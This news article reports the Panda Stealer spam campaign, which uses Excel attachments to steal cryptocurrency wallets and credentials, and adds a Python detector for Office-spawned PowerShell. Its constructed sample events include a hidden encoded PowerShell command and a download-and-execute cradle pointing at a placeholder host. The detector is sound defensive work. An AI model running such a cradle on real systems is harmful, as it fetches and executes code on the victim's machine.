A new information stealer – Panda Stealer – is being delivered in rigged Excel files in a worldwide email spam campaign. The emails masquerade as business quotes and are aimed at stealing victims’ cryptocurrency and other information.
Trend Micro researchers, who first spotted the new stealer in April, said the recent spam campaign has mostly targeted victims in Australia, Germany, Japan, and the U.S.
The fake emails lure victims into clicking on booby-trapped Excel files. The researchers say some of the files are shared by threat actors on Discord.
According to Cisco Talos cybersecurity team, collaboration tools like Slack and Discord are increasingly used to deliver info-stealers, remote-access Trojans (RATs), and other malware.
Once Panda gets installed, it tries to steal details such as private keys for cryptocurrency wallets and a history of past transactions. The targeted wallets include Bytecoin (BCN), Dash (DASH), Ethereum (ETH) and Litecoin (LTC). Beyond stealing wallets, it can also swindle credentials from various sensitive applications, such as NordVPN, Telegram, Discord, and Steam. Panda can take screenshots of the infected computer and filch browser cookies and passwords.
In one scenario the researchers observed, spammers used an .XLSM attachment whose macros fetched a loader that installed the main stealer. In another, an .XLS attachment contained an Excel formula that triggered two PowerShell commands, which ultimately resulted in Panda being installed and executed.
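Both infection chains described above share a telemetry trace a defender can hunt for: an Office process (here Excel) spawning a script host, with PowerShell either launched directly or relayed through cmd.exe. The following added example, not code from the article or from Trend Micro, scores constructed process-creation events in a simplified Sysmon Event ID 1 layout. The log format, file paths, timestamps and the example.invalid URL are all assumptions made for the illustration.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample process-creation events in a simplified Sysmon Event ID 1
# layout: one event per line, "key=value" fields separated by "|". None of these
# are real telemetry; paths and the example.invalid URL are placeholders.
SAMPLE_EVENTS = [
    r"Time=2021-05-06T10:14:02Z|ParentImage=C:\Windows\explorer.exe"
    r"|Image=C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE"
    r'|CommandLine="EXCEL.EXE" C:\Users\alice\Downloads\quote_request.xlsm',
    # Macro-style chain: Excel launches PowerShell directly, hidden and encoded.
    r"Time=2021-05-06T10:14:09Z"
    r"|ParentImage=C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE"
    r"|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    r"|CommandLine=powershell.exe -NoP -W Hidden -EncodedCommand UwB0AGEAZwBlAA==",
    # Formula-style chain: Excel launches cmd.exe, which relays to PowerShell.
    r"Time=2021-05-06T10:15:31Z"
    r"|ParentImage=C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE"
    r"|Image=C:\Windows\System32\cmd.exe"
    r"|CommandLine=cmd.exe /c powershell -c IEX (New-Object Net.WebClient)"
    r".DownloadString('http://example.invalid/loader.ps1')",
    # Benign noise: an interactive user and a scheduled inventory script.
    r"Time=2021-05-06T11:02:44Z|ParentImage=C:\Windows\explorer.exe"
    r"|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    r"|CommandLine=powershell.exe Get-ChildItem C:\Temp",
    r"Time=2021-05-06T11:30:00Z|ParentImage=C:\Windows\System32\svchost.exe"
    r"|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    r"|CommandLine=powershell.exe -NonInteractive -File C:\ProgramData\Scripts\inventory.ps1",
]

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}
# Command-line traits typical of a macro or Excel formula staging a download.
CMDLINE_INDICATORS = {
    "encoded_command": re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{8,}", re.I),
    "hidden_window": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    "download_cradle": re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b", re.I),
    "in_memory_exec": re.compile(r"\biex\b|invoke-expression", re.I),
}
OFFICE_CHAIN_WEIGHT = 3   # a script host under an Office parent is the strongest signal
ALERT_THRESHOLD = 3       # command-line traits alone (1 point each) rarely reach this


def parse_event(line: str) -> Dict[str, str]:
    """Split a 'k=v|k=v' line into a dict; only the first '=' separates key and value."""
    event: Dict[str, str] = {}
    for field in line.split("|"):
        key, _, value = field.partition("=")
        event[key.strip()] = value.strip()
    return event


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path, tolerating quotes and forward slashes."""
    return path.strip('"').replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(event: Dict[str, str]) -> Tuple[int, List[str]]:
    """Return (score, reasons) for one process-creation event."""
    parent = basename(event.get("ParentImage", ""))
    image = basename(event.get("Image", ""))
    cmdline = event.get("CommandLine", "")
    score, reasons = 0, []
    if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
        score += OFFICE_CHAIN_WEIGHT
        reasons.append(f"office_spawned_script_host:{parent}->{image}")
    # cmd.exe relaying to PowerShell is the two-stage pattern behind the .XLS formula.
    if image == "cmd.exe" and re.search(r"\bpowershell\b", cmdline, re.I):
        score += 1
        reasons.append("cmd_relays_to_powershell")
    for name, pattern in CMDLINE_INDICATORS.items():
        if pattern.search(cmdline):
            score += 1
            reasons.append(name)
    return score, reasons


def detect(lines) -> List[Dict[str, object]]:
    """Parse and score every line; return the events at or above ALERT_THRESHOLD."""
    alerts = []
    for line in lines:
        event = parse_event(line)
        score, reasons = score_event(event)
        if score >= ALERT_THRESHOLD:
            alerts.append({"time": event.get("Time", "?"),
                           "image": basename(event.get("Image", "")),
                           "score": score, "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(f"{alert['time']} {alert['image']:<15} score={alert['score']} "
              f"reasons={', '.join(alert['reasons'])}")
```

The parent-child relationship carries most of the weight on purpose: the command-line traits are cheap for an attacker to vary, whereas a spreadsheet opened from an email still has to hand control to some script host. Run against the constructed events, only the two Excel-rooted chains cross the threshold; the interactive and scheduled PowerShell runs score zero.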
Researchers say Panda Stealer is a modified version of the Collector Stealer malware, aka DC Stealer, which is advertised as a “top-end information stealer” and has a Russian-language interface.
The NCP threat actor, aka su1c1de, has cracked Collector Stealer. Its version, Panda Stealer, behaves similarly but uses different command-and-control (C2) URLs, build tags, and execution folders. Both exfiltrate information such as cookies, passwords, and website data from a victim’s computer and store it in an SQLite3 database.
The cracked Collector Stealer is readily available online for free:
“Cybercriminal groups and script kiddies alike can use it to create their own customized version of the stealer and C2 panel,” Trend Micro researchers said. “Threat actors may also augment their malware campaigns with specific features from Collector Stealer.”